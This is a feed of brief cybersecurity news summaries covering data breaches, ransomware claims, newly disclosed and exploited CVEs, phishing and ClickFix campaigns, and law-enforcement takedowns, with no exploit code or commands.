Free VPNs Leak Your Data While Claiming Privacy
Recent research by MysteriumVPN examined 18 of the most downloaded free Android VPN apps and found pervasive privacy violations. Nearly all apps embed multiple third‑party trackers and request dangerous permissions unrelated to VPN functionality, while many connect to hard‑coded servers in sanctioned or heavily surveilled countries. Some apps expose data through unencrypted HTTP connections, further compromising user security. The study concludes that free VPNs act more as data‑collection platforms than genuine privacy tools.
Qilin Ransomware Allegedly Breached Chemical Manufacturer Giant Dow Inc
Cybercrime group Qilin ransomware announced it breached chemical giant Dow Inc., adding the company to its Tor data‑leak site. Dow, a $40 billion global manufacturer with 36,000 employees, has not provided evidence of stolen data. The claim follows Qilin’s rapid growth...
It’s a Mystery … Alleged Unpatched Telegram Zero-Day Allows Device Takeover, but Telegram Denies
TrendAI Zero Day researcher Michael DePlante disclosed a critical zero‑click vulnerability in Telegram (ZDI‑CAN‑30207) that could allow remote code execution via a crafted animated sticker, earning a CVSS score of 9.8. The flaw impacts Android and Linux clients and currently...
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 90
Security Affairs released its Malware Newsletter Round 90, curating roughly 18 recent threat reports spanning nation‑state campaigns, supply‑chain compromises, and novel malware vectors. Highlights include a new Cobra DocGuard infostealer, Iranian actors using Telegram as a command‑and‑control channel, and a supply‑chain attack...
U.S. CISA Adds an Aquasecurity Trivy Flaw to Its Known Exploited Vulnerabilities Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added Aquasecurity's Trivy vulnerability CVE-2026-33634, a 9.3‑severity flaw, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw was weaponized on March 19 when attackers used compromised credentials to publish a malicious...
Researchers Uncover WebRTC Skimmer Bypassing Traditional Defenses
Sansec researchers discovered a novel payment skimmer that leverages WebRTC DataChannels to load malicious code and exfiltrate payment data. Unlike traditional skimmers that rely on HTTP requests, this technique uses encrypted UDP traffic, bypassing Content Security Policy and standard network...
QNAP Fixed Four Vulnerabilities Demonstrated at Pwn2Own Ireland 2025
QNAP has patched four critical SD‑WAN router vulnerabilities (CVE‑2025‑62843 to CVE‑2025‑62846) that were exploited by Team DDOS at Pwn2Own Ireland 2025, earning a $100,000 bounty. The flaws allowed privilege escalation through physical access, weak LAN authentication, an SQL injection, and...
Pro-Iranian Nasir Security Is Targeting Energy Companies in the Gulf
Resecurity has identified a nascent Iran‑linked cybercriminal group, Nasir Security, that is systematically targeting energy firms across the Gulf through supply‑chain compromises. The attackers focus on engineering, construction and safety vendors, stealing authentic contracts, risk‑assessment reports and schematics via business‑email‑compromise...
French Aircraft Carrier Charles De Gaulle Tracked via Strava Activity in OPSEC Failure
Le Monde reported that a French Navy officer unintentionally disclosed the real‑time position of the aircraft carrier Charles de Gaulle by uploading a public Strava run from the deck. The data showed the carrier sailing in the Mediterranean near Cyprus...
CVE-2026-3888: Ubuntu Desktop 24.04+ Vulnerable to Root Exploit
Qualys discovered CVE-2026-3888, a high‑severity local privilege escalation flaw in Ubuntu Desktop 24.04+. The vulnerability exploits a timing window in systemd‑tmpfiles and snap‑confine, allowing an unprivileged user to gain root after 10‑30 days. It carries a CVSS score of 7.8...
From Windows to macOS: ClickFix Attacks Shift Tactics with ChatGPT-Based Lures
ClickFix social‑engineering campaigns, once Windows‑focused, have pivoted to macOS by using ChatGPT‑related lures. Early November 2025 attacks tricked users into copying obfuscated Terminal commands that installed the MacSync infostealer. By December, attackers masqueraded as legitimate ChatGPT conversations and fake GitHub...
U.S. CISA Adds a Flaw in Wing FTP Server to Its Known Exploited Vulnerabilities Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the Wing FTP Server flaw CVE‑2025‑47813 to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability, rated 4.3 on the CVSS scale, discloses the full local installation path when an oversized...
US and European Authorities Disrupt socksEscort Proxy Service Tied to AVrecon Botnet
Law enforcement agencies in the US and Europe dismantled the SocksEscort proxy service, which leveraged the AVrecon botnet to hijack roughly 369,000 routers and IoT devices across 163 countries. The operation, dubbed Operation Lightning, seized 34 domains and 23 servers,...
Beyond File Servers: Securing Unstructured Data in the Era of AI
Legacy file servers still host regulated folders, but most business workflows now live in collaborative documents, code repositories, chat platforms, and AI assistants. Traditional security tools focus on scanning static file locations, leaving gaps where data is created, shared, and...
Apple Issues Emergency Fixes for Coruna Flaws in Older iOS Versions
Apple has issued emergency security updates for legacy iPhone and iPad models, releasing iOS 15.8.7 and iPadOS 16.7.15. The patches address four critical CVEs tied to the Coruna (CryptoWaters) exploit kit, which targets iOS 13.0‑17.2.1. Coruna comprises 23 exploits and...
ENISA Technical Advisory on Secure Package Managers: Essential DevSecOps Guidance
ENISA has published its first Technical Advisory on Secure Package Managers (v1.1), incorporating feedback from 15 stakeholders and experts. The document details common supply‑chain risks of third‑party dependencies and offers concrete practices for selecting, integrating, monitoring, and mitigating vulnerabilities across...
Bell Ambulance Data Breach Impacted over 238,000 People
Bell Ambulance, a U.S. emergency medical services provider, confirmed a data breach that exposed personal, financial, and health information of approximately 238,000 individuals. The breach, detected on February 13, 2025, was linked to the Medusa ransomware group, which claimed to...
Law Enforcement Disrupted Tycoon 2FA Phishing-as-a-Service Platform
Law enforcement, led by Microsoft and Europol, dismantled the Tycoon 2FA phishing‑as‑a‑service platform that was responsible for tens of millions of fraudulent emails each month. By mid‑2025 the service accounted for roughly 62% of all phishing attempts blocked by Microsoft,...
Critical Nginx UI Flaw CVE-2026-27944 Exposes Server Backups
Security researchers have disclosed a critical vulnerability in Nginx UI (CVE‑2026‑27944) with a CVSS score of 9.8. The flaw allows unauthenticated users to call the /api/backup endpoint, retrieve a full server backup, and decrypt it using an AES‑256 key exposed...
Microsoft Warns of ClickFix Campaign Exploiting Windows Terminal to Deliver Lumma Stealer
Microsoft Defender uncovered a new ClickFix campaign that leverages the Windows+X → I shortcut to launch Windows Terminal instead of the traditional Run dialog. Attackers persuade users to paste a hex‑encoded, XOR‑compressed PowerShell command, which downloads a renamed 7‑Zip payload and ultimately...
Automate or Orchestrate? Implementing a Streamlined Remediation Program to Shorten MTTR
Security teams are racing to cut Mean Time to Remediate (MTTR), which averages 4.5 months for critical flaws. The article clarifies the distinction between automation—single‑task, high‑speed fixes—and orchestration—coordinated, multi‑tool workflows for complex exposures. It proposes a routing engine that directs...
Oracle EBS 2025 Campaign Impacts Madison Square Garden, Sensitive Data Leaked
Madison Square Garden confirmed a data breach tied to the 2025 Oracle E‑Business Suite hacking campaign. The Cl0p ransomware group exploited a zero‑day vulnerability (CVE‑2025‑61882) to steal over 210 GB of archived files, including employee payroll and Social Security numbers. MSG...
CVE-2025-64328 Exploitation Impacts 900 Sangoma FreePBX Instances
Around 900 Sangoma FreePBX installations were compromised after attackers leveraged CVE-2025-64328, a post‑authentication command‑injection flaw in the Endpoint Manager module. The vulnerability, rated 8.6 on the CVSS scale, allowed malicious code execution and led to the deployment of the EncystPHP...
Iran ’S Internet Near-Totally Blacked Out Amid US, Israeli Strikes
Iran experienced a near‑total internet blackout on Feb. 28, 2026, as U.S. and Israeli strikes hit the country. Network monitoring by NetBlocks showed national connectivity dropping to roughly 4% of normal levels, while Cloudflare reported traffic falling to effectively zero...
How AI Aids Incident Response: Why Humans Alone Cannot Do IR Efficiently
Incident response traditionally relies on manual log correlation, alert validation, and report drafting, consuming 10‑20 minutes per case and often days for complex attacks. AI‑enabled platforms now ingest telemetry from SIEM, EDR, identity, and cloud sources the moment an alert...
12 Million Exposed .env Files Reveal Widespread Security Failures
Mysterium VPN’s research uncovered more than 12 million IP addresses serving publicly accessible .env‑style files, leaking credentials such as database passwords, API keys, and JWT signing secrets. The United States leads the exposure count with roughly 2.8 million IPs, while Japan, Germany,...
SolarWinds Patches Four Critical Serv-U Flaws Enabling Root Access
SolarWinds has issued patches for four critical Serv‑U vulnerabilities (CVE‑2025‑40538, 40539, 40540, 40541), each scoring 9.1 on the CVSS scale. The flaws—broken access control, two type‑confusion bugs, and an IDOR issue—enable remote code execution that can grant attackers full root...
VMware Aria Operations Flaws Could Enable Remote Attacks
Broadcom released security updates fixing three critical flaws in VMware Aria Operations, including a remote command injection (CVE-2026-22719) with a CVSS score of 8.1, a stored cross‑site scripting issue (CVE-2026-22720) rated 8.0, and a privilege‑escalation bug (CVE-2026-22721) scored 6.2. The...
Operation MacroMaze: APT28 Exploits Webhooks for Covert Data Exfiltration
Operation MacroMaze, a Russia‑linked APT28 campaign, targeted Western and Central European organizations from September 2025 to January 2026. The attackers embedded an INCLUDEPICTURE field in Word documents that fetched a JPG from webhook.site, creating a covert tracking pixel and confirming document opening....
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 85
The Security Affairs Malware Newsletter Round 85 aggregates the latest research and incident reports on global malware threats. Highlights include new Android threats like Ninja Browser, Lumma Infostealer, PromptSpy and Phantom Trojans, a surge in ATM jackpotting across the U.S., and...
U.S. CISA Adds RoundCube Webmail Flaws to Its Known Exploited Vulnerabilities Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two critical RoundCube Webmail vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The flaws—CVE-2025-49113, a deserialization bug with a 9.9 CVSS score, and CVE-2025-68461, an SVG‑based XSS issue scoring 7.2—target...
CISA Alerts to Critical Auth Bypass CVE-2026-1670 in Honeywell CCTVs
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert for a critical authentication‑bypass vulnerability (CVE‑2026‑1670) in several Honeywell CCTV models, receiving a CVSS score of 9.8. The flaw lets unauthenticated attackers change the recovery email address, enabling...
French Ministry Confirms Data Access to 1.2 Million Bank Accounts
The French Economy Ministry disclosed that a hacker used stolen government credentials to view data from 1.2 million bank accounts across the country. The breach, detected in late January, exposed personal details such as names, addresses, account numbers and, in some...
Poorly Crafted Phishing Campaign Leverages Bogus Security Incident Report
A phishing campaign leveraged a fake PDF security incident report hosted on Amazon S3 to intimidate MetaMask users into enabling two‑factor authentication. The PDF, created with ReportLab, contains no malicious code but mimics an official security alert. Researchers noted the...
Encrypted RCS Messaging Support Lands in Apple’s iOS 26.4 Developer Build
Apple introduced end‑to‑end encrypted Rich Communication Services (RCS) messaging in the iOS 26.4 developer beta, extending the feature to iPadOS, macOS and watchOS in future updates. The encryption is currently limited to iPhone‑to‑iPhone conversations and depends on carrier support, with a...
Critical Fortinet FortiClientEMS Flaw Allows Remote Code Execution
Fortinet disclosed a critical vulnerability (CVE‑2026‑21643) in its FortiClientEMS product, earning a CVSS 9.1 rating. The flaw is an unauthenticated SQL‑injection that allows remote code execution via crafted HTTP requests. Only FortiClientEMS 7.4.4 is affected, and Fortinet recommends upgrading to...
Attackers Abuse SolarWinds Web Help Desk to Install Zoho Agents and Velociraptor
On February 7, 2026, Huntress confirmed active exploitation of multiple critical vulnerabilities in SolarWinds Web Help Desk (WHD), including CVE‑2025‑40551 and CVE‑2025‑26399, which permit arbitrary code execution via untrusted deserialization. Attackers leveraged the flaw to install a Zoho ManageEngine remote‑management...
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 83
Security Affairs released its Malware Newsletter Round 83, curating the latest research and incident reports across the global malware landscape. The edition spotlights 341 malicious capabilities uncovered in the ClawHavoc bot, APT28’s exploitation of CVE‑2026‑21509, and Amaranth‑Dragon’s weaponization of CVE‑2025‑8088 for...
Nearly 5 Million Web Servers Found Exposing Git Metadata – Study Reveals Widespread Risk of Code and Credential Leaks
A 2026 Mysterium VPN study uncovered nearly 5 million public web servers exposing Git repository metadata, with over 250,000 .git/config files leaking active deployment credentials. The misconfigurations allow attackers to reconstruct source code, steal secrets, and potentially gain cloud access. Affected...
Microsoft: Info-Stealing Malware Expands From Windows to macOS
Microsoft has observed a rapid rise in information‑stealing malware targeting macOS, a shift from its traditional Windows focus. Since late 2025, threat actors have deployed macOS‑specific stealers such as DigitStealer, MacSync and Atomic macOS Stealer, often written in Python and...
SmarterTools Patches Critical SmarterMail Flaw Allowing Code Execution
SmarterTools released build 9511 to remediate two critical SmarterMail flaws, CVE-2026-24423 and CVE-2026-23760, each scoring 9.3 on the CVSS scale. The first vulnerability allowed unauthenticated attackers to execute arbitrary OS commands via the ConnectToHub API, while the second bypassed authentication...
Google Targets IPIDEA in Crackdown on Global Residential Proxy Networks
Google and partners disrupted the IPIDEA residential proxy network, one of the world’s largest, by taking down domains, sharing intelligence, and enforcing Play Protect. The operation removed SDKs embedded in millions of Android, Windows, iOS, and WebOS apps, sharply reducing...
Emergency Microsoft Update Fixes In-the-Wild Office Zero-Day
Microsoft released emergency out‑of‑band updates to remediate CVE‑2026‑21509, a zero‑day flaw actively exploited in the wild. The vulnerability bypasses OLE security controls in Office 2016 through 2024 and Microsoft 365 Apps, allowing attackers to execute malicious code via crafted Office...
Nike Is Investigating a Possible Data Breach, After WorldLeaks Claims
Nike announced it is probing a potential cyber incident after the WorldLeaks group claimed to have accessed and exfiltrated roughly 1.4 TB of company data. The hacker collective, which evolved from the Hunters International ransomware gang, posted the alleged breach on...
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 81
Security Affairs’ Malware Newsletter Round 81 curates the latest threats and research across the malware landscape. Highlights include the emergence of AI‑generated malware frameworks such as VoidLink, sophisticated evasion tactics like PDFSIDER’s DLL side‑loading, and supply‑chain abuse via a malicious...
U.S. CISA Adds a Flaw in Broadcom VMware vCenter Server to Its Known Exploited Vulnerabilities Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the critical VMware vCenter Server flaw CVE-2024-37079 to its Known Exploited Vulnerabilities (KEV) catalog. The heap‑overflow bug in the DCERPC implementation carries a CVSS score of 9.8 and enables remote...
Zoom Fixed Critical Node Multimedia Routers Flaw
Zoom released security patches that fix a critical command‑injection flaw (CVE‑2026‑22844) in its Node Multimedia Routers (MMR). The vulnerability, rated 9.9 on the CVSS scale, could let a meeting participant execute arbitrary code on affected MMRs. Versions prior to 5.2.1716.0...
Crooks Impersonate LastPass in Campaign to Harvest Master Passwords
LastPass disclosed an active phishing campaign that began around January 19, 2026, in which attackers impersonated the service with urgent‑maintenance emails to harvest master passwords. The messages contain links to an Amazon S3‑hosted page that redirects to a counterfeit LastPass...
Hacktivists Hijacked Iran ’S State TV to Air Anti-Regime Messages and an Appeal to Protest From Reza Pahlavi
Hackers seized control of Iran’s Badr satellite on Jan 18, 2026, broadcasting a ten‑minute anti‑regime video featuring exiled Crown Prince Reza Pahlavi. The clip urged citizens to keep protesting and called on the military to join demonstrators. The intrusion occurred amid a...
Data Breach at Canada’s Investment Watchdog Canadian Investment Regulatory Organization Impacts 750,000 People
Canada’s self‑regulatory body, the Canadian Investment Regulatory Organization (CIRO), disclosed a data breach affecting roughly 750,000 individuals. The breach stemmed from a phishing attack in August 2025 that allowed threat actors to copy a limited set of investigative, compliance and...
